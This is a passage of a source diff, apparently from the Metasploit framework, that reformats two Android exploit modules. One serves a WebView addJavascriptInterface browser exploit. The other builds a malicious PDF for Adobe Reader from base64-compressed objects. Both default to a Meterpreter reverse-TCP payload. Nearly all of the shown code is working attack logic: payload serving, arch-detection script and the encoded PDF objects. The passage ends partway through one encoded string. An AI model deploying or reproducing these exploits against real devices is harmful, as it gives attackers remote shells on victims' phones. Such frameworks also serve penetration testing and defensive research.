-        :os_name    => OperatingSystems::Match::ANDROID,
-        :vuln_test  => VULN_CHECK_JS,
-        :vuln_test_error => 'No vulnerable Java objects were found in this web context.'
-      }
-    ))
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jduck', # original msf module
+          'joev'   # static server
+        ],
+        'References' => [
+          ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
+          ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
+          ['URL', 'http://50.56.33.56/blog/?p=314'],
+          ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
+          ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
+          ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
+          ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
+          ['EDB', '31519'],
+          ['OSVDB', '97520']
+        ],
+        'Platform' => ['android', 'linux'],
+        'Arch' => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
+        'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
+        'Targets' => [ [ 'Automatic', {} ] ],
+        'DisclosureDate' => '2012-12-21',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        },
+        'BrowserRequirements' => {
+          source: 'script',
+          os_name: OperatingSystems::Match::ANDROID,
+          vuln_test: VULN_CHECK_JS,
+          vuln_test_error: 'No vulnerable Java objects were found in this web context.'
+        }
+      )
+    )
 
     deregister_options('JsObfuscate')
   end
@@ -93,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # The browser appears to be vulnerable, serve the exploit
-  def on_request_exploit(cli, req, browser)
+  def on_request_exploit(cli, _req, browser)
     arch = normalize_arch(browser[:arch])
     print_status "Serving #{arch} exploit..."
     send_response_html(cli, html(arch))
@@ -102,14 +109,14 @@ class MetasploitModule < Msf::Exploit::Remote
   # Called when a client requests a .js route.
   # This is handy for post-XSS.
   def serve_static_js(cli, req)
-    arch          = req.qstring['arch']
+    arch = req.qstring['arch']
     response_opts = { 'Content-type' => 'text/javascript' }
 
     if arch.present?
       print_status("Serving javascript for arch #{normalize_arch arch}")
-      send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
+      send_response(cli, add_javascript_interface_exploit_js(normalize_arch(arch)), response_opts)
     else
-      print_status("Serving arch detection javascript")
+      print_status('Serving arch detection javascript')
       send_response(cli, static_arch_detect_js, response_opts)
     end
   end
@@ -119,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # versions of the static .js file (x86/mips/arm) to choose from. This
   # small snippet of js detects the arch and requests the correct file.
   def static_arch_detect_js
-    %Q|
+    %|
       var arches = {};
       arches['#{ARCH_ARMLE}']  = /arm/i;
       arches['#{ARCH_MIPSLE}'] = /mips/i;
@@ -136,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (arch) {
         // load the script with the correct arch
         var script = document.createElement('script');
-        script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
+        script.setAttribute('src', '#{get_uri}/#{Rex::Text.rand_text_alpha(5)}.js?arch='+arch);
         script.setAttribute('type', 'text/javascript');
 
         // ensure body is parsed and we won't be in an uninitialized state
@@ -150,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # @return [String] normalized client architecture
   def normalize_arch(arch)
-    if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
+    SUPPORTED_ARCHES.include?(arch) ? arch : DEFAULT_ARCH
   end
 
   def html(arch)

--- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb
+++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb
@@ -11,69 +11,79 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Android
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Adobe Reader for Android addJavascriptInterface Exploit',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Adobe Reader for Android addJavascriptInterface Exploit',
+        'Description' => %q{
           Adobe Reader versions less than 11.2.0 exposes insecure native
           interfaces to untrusted javascript in a PDF. This module embeds the browser
           exploit from android/webview_addjavascriptinterface into a PDF to get a
           command shell on vulnerable versions of Reader.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [
-        'Yorick Koster', # discoverer
-        'joev' # msf module
-      ],
-      'References'     =>
-        [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Yorick Koster', # discoverer
+          'joev' # msf module
+        ],
+        'References' => [
           [ 'CVE', '2014-0514' ],
           [ 'EDB', '32884' ],
           [ 'OSVDB', '105781' ],
         ],
-      'Platform'       => 'android',
-      'DefaultOptions' => {
-        'PAYLOAD' => 'android/meterpreter/reverse_tcp'
-      },
-      'Targets'        => [
-        [ 'Android ARM', {
-            'Platform' => 'android',
-            'Arch' => ARCH_ARMLE
-          }
+        'Platform' => 'android',
+        'DefaultOptions' => {
+          'PAYLOAD' => 'android/meterpreter/reverse_tcp'
+        },
+        'Targets' => [
+          [
+            'Android ARM', {
+              'Platform' => 'android',
+              'Arch' => ARCH_ARMLE
+            }
+          ],
+          [
+            'Android MIPSLE', {
+              'Platform' => 'android',
+              'Arch' => ARCH_MIPSLE
+            }
+          ],
+          [
+            'Android X86', {
+              'Platform' => 'android',
+              'Arch' => ARCH_X86
+            }
+          ]
         ],
-        [ 'Android MIPSLE', {
-            'Platform' => 'android',
-            'Arch' => ARCH_MIPSLE
-          }
-        ],
-        [ 'Android X86', {
-            'Platform' => 'android',
-            'Arch' => ARCH_X86
-          }
-        ]
-      ],
-      'DisclosureDate' => '2014-04-13',
-      'DefaultTarget'  => 0
-    ))
+        'DisclosureDate' => '2014-04-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        }
+      )
+    )
 
     register_options([
-      OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
+      OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
     ])
   end
 
   def exploit
-    print_status("Generating Javascript exploit...")
+    print_status('Generating JavaScript exploit...')
     js = add_javascript_interface_exploit_js(ARCH_ARMLE)
-    print_status("Creating PDF...")
+    print_status('Creating PDF...')
     file_create(pdf(js))
   end
 
   def trailer(root_obj)
-    id = @xref.keys.max+1
-    "trailer" << eol << "<</Size %d/Root " % id << io_ref(root_obj) << ">>" << eol
+    id = @xref.keys.max + 1
+    'trailer' << eol << '<</Size %d/Root ' % id << io_ref(root_obj) << '>>' << eol
   end
 
-  def add_compressed(n, data)
-    add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data)))
+  def add_compressed(num, data)
+    add_object(num, Zlib::Inflate.inflate(Rex::Text.decode_base64(data)))
   end
 
   def pdf(js)
@@ -81,47 +91,47 @@ class MetasploitModule < Msf::Exploit::Remote
     @xref = {}
     @pdf = header('1.6')
 
-    add_compressed(25, "eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9")
-    add_compressed(40, "eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw")
-    add_compressed(3, "eJztV91umzAUfoK8g8UuN2OMIQkWUFWJplUqU7VGam+N7aSs/AmMQvtqvdgj7RVmEpKRNJp2M2kXWAjZ+Hzfd3zO4Uie+D66lflGPQFCMEH3TaxeSokeo1u06iaRVEwwxcKwVpVk2cS/akvGn6UCsdwkeWD8fPthgEQExoMbWVG5kE/Jl9dK3r9+XfHXZ+4J4yqc+C1tszLTZKDN0rymbWAwUcSS6nn3GRlgZ6KeA+O62wCP0R1YFJUErulAblkumM1N7MyIPf0EbAvbyJojm0BMqNU9oB9GONFvvxJr+m35uZfTq8B4UqqkCG23W3NLzKLaIOx5HrJsZNtQW8D6JVeshXn9YU9y4FnKmldJqZIiB92axUWjAsOYgMHoz5WVR6G8NndnNHmRoZaVCJsWugQS/IgpmyrduSY4kqnMZK5qjcMXcVosiv4sl2UXkeUgHic4vaFxBB0D0MVA69CoEMn6ZcmUDHXwHWi5kOAVtil2qD3VS2pZPjqzPONY6ApScsBBdhyEEpe6+KNlHzkGlud+9AX5V54MbS/5UlSrokjDfcFd86qImQJYx23gRW8zgAtO10WVMRWyskwTzrrC6CLno99bp/YqUenQhUNlXafq9OthI026TNGU5ZvAaKGQa9akygi/16ZqlY/2NmeM6D3lzqVzdX9XOHRZ8KYrsJtl2DSJoJ6Yu1NPSjhbizl0nJhBj885nErXtl3iejFzd4E5xb7jvclrxXIuD7wOn1nONNaZcjwCPcuJIXNdGwqOZ3ObxySO8YF3gB3w6tjSu6oQDZdVeMjTg4zBgpWq0T1in7MTs8kwKIM/eN8eUN8fdGtCx970LhX/ZIwio8goMoqMIqPIKPJfiQxuNzLXV5ptd3fRs/7u8wtzq37r")
-    add_compressed(32, "eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo")
-    add_compressed(7, "eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a")
-    add_compressed(16, "eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==")
-    add_compressed(22, "eJzjtbHRD1Mw1DMytbPjBQARcgJ6")
-    add_compressed(10, "eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=")
-    add_compressed(11, "eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR")
-    add_compressed(12, "eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD")
-    add_compressed(13, "eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=")
-    add_compressed(14, "eJzjjTY0VTBQCFKAULG8ABzfA0M=")
-    add_compressed(15, "eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==")
-    add_compressed(26, "eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==")
-    add_compressed(41, "eJzjjTa2UDBQCIrlBQAKzAIA")
-    add_compressed(54, "eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=")
-    add_compressed(34, "eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK")
-    add_compressed(35, "eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==")
-    add_compressed(33, "eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==")
-    add_compressed(29, "eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=")
-    add_compressed(36, "eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==")
-    add_compressed(30, "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")
-    add_compressed(38, "eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=")
-    add_compressed(43, "eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==")
-    add_compressed(51, "eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=")
+    add_compressed(25, 'eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9')
+    add_compressed(40, 'eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw')
+    add_compressed(3, 'eJztV91umzAUfoK8g8UuN2OMIQkWUFWJplUqU7VGam+N7aSs/AmMQvtqvdgj7RVmEpKRNJp2M2kXWAjZ+Hzfd3zO4Uie+D66lflGPQFCMEH3TaxeSokeo1u06iaRVEwwxcKwVpVk2cS/akvGn6UCsdwkeWD8fPthgEQExoMbWVG5kE/Jl9dK3r9+XfHXZ+4J4yqc+C1tszLTZKDN0rymbWAwUcSS6nn3GRlgZ6KeA+O62wCP0R1YFJUErulAblkumM1N7MyIPf0EbAvbyJojm0BMqNU9oB9GONFvvxJr+m35uZfTq8B4UqqkCG23W3NLzKLaIOx5HrJsZNtQW8D6JVeshXn9YU9y4FnKmldJqZIiB92axUWjAsOYgMHoz5WVR6G8NndnNHmRoZaVCJsWugQS/IgpmyrduSY4kqnMZK5qjcMXcVosiv4sl2UXkeUgHic4vaFxBB0D0MVA69CoEMn6ZcmUDHXwHWi5kOAVtil2qD3VS2pZPjqzPONY6ApScsBBdhyEEpe6+KNlHzkGlud+9AX5V54MbS/5UlSrokjDfcFd86qImQJYx23gRW8zgAtO10WVMRWyskwTzrrC6CLno99bp/YqUenQhUNlXafq9OthI026TNGU5ZvAaKGQa9akygi/16ZqlY/2NmeM6D3lzqVzdX9XOHRZ8KYrsJtl2DSJoJ6Yu1NPSjhbizl0nJhBj885nErXtl3iejFzd4E5xb7jvclrxXIuD7wOn1nONNaZcjwCPcuJIXNdGwqOZ3ObxySO8YF3gB3w6tjSu6oQDZdVeMjTg4zBgpWq0T1in7MTs8kwKIM/eN8eUN8fdGtCx970LhX/ZIwio8goMoqMIqPIKPJfiQxuNzLXV5ptd3fRs/7u8wtzq37r')
+    add_compressed(32, 'eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo')
+    add_compressed(7, 'eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a')
+    add_compressed(16, 'eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==')
+    add_compressed(22, 'eJzjtbHRD1Mw1DMytbPjBQARcgJ6')
+    add_compressed(10, 'eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=')
+    add_compressed(11, 'eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR')
+    add_compressed(12, 'eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD')
+    add_compressed(13, 'eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=')
+    add_compressed(14, 'eJzjjTY0VTBQCFKAULG8ABzfA0M=')
+    add_compressed(15, 'eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==')
+    add_compressed(26, 'eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==')
+    add_compressed(41, 'eJzjjTa2UDBQCIrlBQAKzAIA')
+    add_compressed(54, 'eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=')
+    add_compressed(34, 'eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK')
+    add_compressed(35, 'eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==')
+    add_compressed(33, 'eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==')
+    add_compressed(29, 'eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=')
+    add_compressed(36, 'eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==')
+    add_compressed(30, 'eJwBXAqj9Q08PC9BbHRlcm5hdGUvRGV2aWNlUkdCL0ZpbHRlci9GbGF0ZURlY29kZS9MZW5ndGggMjU3NC9OIDM+PnN0cmVhbQ1IiZyWeVRTdxbHf2/JnpCVsMNjDVuAsAaQNWxhkR0EUQhJCAESQkjYBUFEBRRFRISqlTLWbXRGT0WdLq5jrQ7WferSA/Uw6ug4tBbXjp0XOEedTmem0+8f7/c593fv793fvfed8wCgJ6WqtdUwCwCN1qDPSozFFhUUYqQJAAMNIAIRADJ5rS4tOyEH4JLGS7Ba3An8i55eB5BpvSJMysAw8P+JLdfpDQBAGTgHKJS1cpw7ca6qN+hM9hmceaWVJoZRE+vxBHG2NLFqnr3nfOY52sQNjVaBsylnnUKjMPFpnFfXGZU4I6k4d9WplfU4X8XZpcqoUeP83BSrUcpqAUDpJrtBKS/H2Q9nuj4nS4LzAgDIdNU7XPoOG5QNBtOlJNW6Rr1aVW7A3OUemCg0VIwlKeurlAaDMEMmr5TpFZikWqOTaRsBmL/znDim2mJ4kYNFocHBQn8f0TuF+q+bv1Cm3s7Tk8y5nkH8C29tP+dXPQ2AeBavzfq3ttItAIyvBMDy5luby/sAMPG+Hb74zn34pnkpNxh0Yb6+9fX1Pmql3MdU0Df6nw6/QO+8z8d03JvyYHHKMpmxyoCZ6iavrqo26rFanUyuxIQ/HeJfHfjzeXhnKcuUeqUWj8jDp0ytVeHt1irUBnW1FlNr/1MTf2XYTzQ/17i4Y68Br9gHsC7yAPK3CwDl0gBStA3fgd70LZWSBzLwNd/h3vzczwn691PhPtOjVq2ai5Nk5WByo75ufs/0WQICoAIm4AErYA+cgTsQAn8QAsJBNIgHySAd5IACsBTIQTnQAD2oBy2gHXSBHrAebALDYDsYA7vBfnAQjIOPwQnwR3AefAmugVtgEkyDh2AGPAWvIAgiQQyIC1lBDpAr5AX5Q2IoEoqHUqEsqAAqgVSQFjJCLdANqAfqh4ahHdBu6PfQUegEdA66BH0FTUEPoO+glzAC02EebAe7wb6wGI6BU+AceAmsgmvgJrgTXgcPwaPwPvgwfAI+D1+DJ+GH8CwCEBrCRxwRISJGJEg6UoiUIXqkFelGBpFRZD9yDDmLXEEmkUfIC5SIclEMFaLhaBKai8rRGrQV7UWH0V3oYfQ0egWdQmfQ1wQGwZbgRQgjSAmLCCpCPaGLMEjYSfiIcIZwjTBNeEokEvlEATGEmEQsIFYQm4m9xK3EA8TjxEvEu8RZEolkRfIiRZDSSTKSgdRF2kLaR/qMdJk0TXpOppEdyP7kBHIhWUvuIA+S95A/JV8m3yO/orAorpQwSjpFQWmk9FHGKMcoFynTlFdUNlVAjaDmUCuo7dQh6n7qGept6hMajeZEC6Vl0tS05